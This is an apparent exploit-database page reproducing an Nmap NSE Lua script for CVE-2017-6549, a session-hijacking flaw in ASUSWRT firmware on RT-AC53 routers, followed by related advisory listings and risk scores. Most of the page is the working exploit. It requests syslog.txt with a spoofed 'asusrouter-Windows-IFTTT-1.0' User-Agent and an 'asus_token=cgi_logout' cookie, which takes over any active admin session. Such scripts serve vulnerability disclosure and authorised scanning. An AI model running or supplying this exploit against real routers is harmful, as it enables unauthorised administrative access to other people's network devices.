ASUS WRT Session Hijacking Nmap NSE Script

🗓️ 07 Apr 2017 00:00:00Reported by Rewanth CoolType

packetstorm🔗 packetstormsecurity.com👁 75 Views

ASUS WRT Session Hijacking vulnerability on RT-AC53 device

Reporter	Title	Published	Views	Family All 11
Check Point Advisories	ASUSWRT AC53 Session Stealing Remote Command Execution (CVE-2017-6549)	15 Jul 201800:00	–	checkpoint_advisories
CVE	CVE-2017-6549	9 Mar 201709:26	–	cve
Cvelist	CVE-2017-6549	9 Mar 201709:26	–	cvelist
Exploit DB	ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing	8 Mar 201700:00	–	exploitdb
exploitpack	ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing	8 Mar 201700:00	–	exploitpack
NVD	CVE-2017-6549	9 Mar 201709:59	–	nvd
OSV	CVE-2017-6549	9 Mar 201709:59	–	osv
Prion	Session fixation	9 Mar 201709:59	–	prion
seebug.org	ASUSWRT - Multiple Vulnerabilities	10 Mar 201700:00	–	seebug
seebug.org	Asus_DeleteOfflineClientOverflow	26 Dec 201700:00	–	seebug

`local http = require "http"  
local shortport = require "shortport"  
local stdnse = require "stdnse"  
local string = require "string"  
local vulns = require "vulns"  
local nmap = require "nmap"  
  
description = [[  
ASUSWRT is a wireless router operating system that powers many routers produced by ASUS.  
Session hijack vulnerability in httpd in ASUS ASUSWRT on RT-AC53 3.0.0.4.380.6038 devices  
allows remote attackers to steal any active admin session by sending cgi_logout  
and asusrouter-Windows-IFTTT-1.0 in certain HTTP headers.  
If an attacker sets his cookie value to cgi_logout and puts  
asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated  
as signed-in if any other administrator session is active.  
NOTE: This vulnerability is yet to be patched by the vendors.  
]]  
  
---  
-- @usage  
-- nmap --script http-asuswrt-session-hijacking <ip>  
--  
-- @args  
-- http-asuswrt-session-hijacking.uri  
-- Default: '/' (Preferred)  
--  
-- @output  
-- PORT STATE SERVICE  
-- 80/tcp open http  
-- | http-asuswrt-session-hijacking  
-- | VULNERABLE:  
-- | XSS  
-- | State: VULNERABLE (Exploitable)  
-- | IDs:  
-- | CVE: CVE-2017-6549  
-- | Session hijack vulnerability in httpd in ASUS ASUSWRT on RT-AC53 3.0.0.4.380.6038 devices  
-- | allows remote attackers to steal any active admin session by sending cgi_logout  
-- | and asusrouter-Windows-IFTTT-1.0 in certain HTTP headers.  
-- |  
-- | NOTE: This vulnerability is yet to be patched by the vendors.  
-- |  
-- | References:  
-- | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6549  
--  
---  
  
author = "Rewanth Cool"  
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"  
categories = {"vuln", "intrusive", "exploit", "dos"}  
  
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")  
  
action = function(host, port)  
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"  
local file = "syslog.txt"  
  
local opt = {  
header = {  
['User-Agent'] = "asusrouter-Windows-IFTTT-1.0",  
['Cookie'] = "asus_token=cgi_logout"  
}  
}  
  
-- Exploiting the vulnerability  
local response = http.get( host, port, uri..file, opt )  
  
if( response.status == 200 ) then  
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)  
local vuln = {  
title = "Session stealing vulnerability in httpd in ASUS ASUSWRT",  
state = vulns.STATE.EXPLOIT,  
description = [[  
Session hijack vulnerability in httpd in ASUS ASUSWRT on RT-AC53 3.0.0.4.380.6038 devices  
allows remote attackers to steal any active admin session by sending cgi_logout  
and asusrouter-Windows-IFTTT-1.0 in certain HTTP headers.  
NOTE: This vulnerability is yet to be patched by the vendors.  
]],  
IDS = {  
CVE = "CVE-2017-6549",  
references = {  
"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6549"  
},  
dates = {  
disclosure = {  
year = "2017",  
month = "03",  
day = "08"  
},  
}  
}  
}  
  
return vulnReport:make_output(vuln)  
end  
end  
  
`

07 Apr 2017 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.24524